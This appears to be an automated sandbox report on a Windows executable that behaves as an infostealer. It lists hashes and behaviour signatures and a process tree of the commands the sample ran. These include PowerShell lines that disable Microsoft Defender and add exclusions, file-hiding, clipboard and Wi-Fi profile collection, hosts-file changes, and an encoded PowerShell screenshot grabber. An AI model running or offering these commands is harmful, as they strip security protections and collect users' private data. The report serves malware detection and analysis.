Analysis

  • max time kernel
    96s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 15:03

General

  • Target

    SecHex-GUI.exe

  • Size

    5.9MB

  • MD5

    54e1a0202204ceb2891bcd69916af0b7

  • SHA1

    c65d7231e64e9d398b8119ecacbdafe0f9063be1

  • SHA256

    aa691b29687e9885a8d8dad4d8135dfc345069ff5a231333c7b6a093af1ad951

  • SHA512

    d5e4130d01d2e141de900bdbdcc9eb82c6de437bee9b045fa8cc0ce8aa18620fe93bf08dd5306beb6958eb001c3354e457e1ec14c1df10200951b86c18d76030

  • SSDEEP

    98304:Go+WCSD5i65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeFF9hJkr+lmek:G7mDbDOYjJlpZstQoS9Hf12VKXqbJCQk

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 17 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe
    "C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1048
    • C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe
      "C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      PID:2768
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe'"
        3⤵
          PID:4636
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4108
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          3⤵
            PID:3068
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3416
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
              PID:4440
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:1168
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              3⤵
                PID:3844
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic csproduct get uuid
                  4⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3140
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                3⤵
                  PID:4532
                  • C:\Windows\system32\reg.exe
                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                    4⤵
                      PID:4328
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                    3⤵
                      PID:720
                      • C:\Windows\system32\reg.exe
                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                        4⤵
                          PID:3464
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                        3⤵
                          PID:2148
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic path win32_VideoController get name
                            4⤵
                            • Detects videocard installed
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2316
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                          3⤵
                            PID:1220
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic path win32_VideoController get name
                              4⤵
                              • Detects videocard installed
                              PID:3840
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe""
                            3⤵
                            • Hide Artifacts: Hidden Files and Directories
                            PID:440
                            • C:\Windows\system32\attrib.exe
                              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe"
                              4⤵
                              • Views/modifies file attributes
                              PID:2344
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‌.scr'"
                            3⤵
                              PID:4224
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‌.scr'
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2052
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                              3⤵
                                PID:4924
                                • C:\Windows\system32\tasklist.exe
                                  tasklist /FO LIST
                                  4⤵
                                  • Enumerates processes with tasklist
                                  PID:4452
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                3⤵
                                  PID:4332
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO LIST
                                    4⤵
                                    • Enumerates processes with tasklist
                                    PID:216
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                  3⤵
                                  • Clipboard Data
                                  PID:2404
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-Clipboard
                                    4⤵
                                    • Clipboard Data
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4192
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                  3⤵
                                    PID:3076
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                      4⤵
                                        PID:4492
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                      3⤵
                                        PID:3128
                                        • C:\Windows\system32\tasklist.exe
                                          tasklist /FO LIST
                                          4⤵
                                          • Enumerates processes with tasklist
                                          PID:852
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:4648
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            4⤵
                                              PID:4532
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:4860
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                              3⤵
                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                              PID:3688
                                              • C:\Windows\system32\netsh.exe
                                                netsh wlan show profile
                                                4⤵
                                                • Event Triggered Execution: Netsh Helper DLL
                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                PID:3308
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "systeminfo"
                                              3⤵
                                                PID:748
                                                • C:\Windows\system32\systeminfo.exe
                                                  systeminfo
                                                  4⤵
                                                  • Gathers system information
                                                  PID:4712
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                3⤵
                                                  PID:4440
                                                  • C:\Windows\system32\reg.exe
                                                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                    4⤵
                                                      PID:1508
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                    3⤵
                                                      PID:2388
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1804
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ptkiw13z\ptkiw13z.cmdline"
                                                          5⤵
                                                            PID:5388
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD198.tmp" "c:\Users\Admin\AppData\Local\Temp\ptkiw13z\CSC16BB92C47F87422FA5FF21A9F5AB863.TMP"
                                                              6⤵
                                                                PID:5640
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                          3⤵
                                                            PID:2916
                                                            • C:\Windows\system32\attrib.exe
                                                              attrib -r C:\Windows\System32\drivers\etc\hosts
                                                              4⤵
                                                              • Drops file in Drivers directory
                                                              • Views/modifies file attributes
                                                              PID:5180
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            3⤵
                                                              PID:4412
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                4⤵
                                                                  PID:5188
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                3⤵
                                                                  PID:5244
                                                                  • C:\Windows\system32\attrib.exe
                                                                    attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                    4⤵
                                                                    • Drops file in Drivers directory
                                                                    • Views/modifies file attributes
                                                                    PID:5344
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                  3⤵
                                                                    PID:5280
                                                                    • C:\Windows\system32\tree.com
                                                                      tree /A /F
                                                                      4⤵
                                                                        PID:5380
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                      3⤵
                                                                        PID:5400
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /FO LIST
                                                                          4⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:5532
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                        3⤵
                                                                          PID:5440
                                                                          • C:\Windows\system32\tree.com
                                                                            tree /A /F
                                                                            4⤵
                                                                              PID:5576
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                            3⤵
                                                                              PID:5604
                                                                              • C:\Windows\system32\tree.com
                                                                                tree /A /F
                                                                                4⤵
                                                                                  PID:5696
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                3⤵
                                                                                  PID:5724
                                                                                  • C:\Windows\system32\tree.com
                                                                                    tree /A /F
                                                                                    4⤵
                                                                                      PID:5784
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4244"
                                                                                    3⤵
                                                                                      PID:5852
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        taskkill /F /PID 4244
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:5904
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4244"
                                                                                      3⤵
                                                                                        PID:5912
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /F /PID 4244
                                                                                          4⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:6056
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2696"
                                                                                        3⤵
                                                                                          PID:6084
                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                            taskkill /F /PID 2696
                                                                                            4⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:736
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2696"
                                                                                          3⤵
                                                                                            PID:1680
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              taskkill /F /PID 2696
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:4916
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1492"
                                                                                            3⤵
                                                                                              PID:5156
                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                taskkill /F /PID 1492
                                                                                                4⤵
                                                                                                • Kills process with taskkill
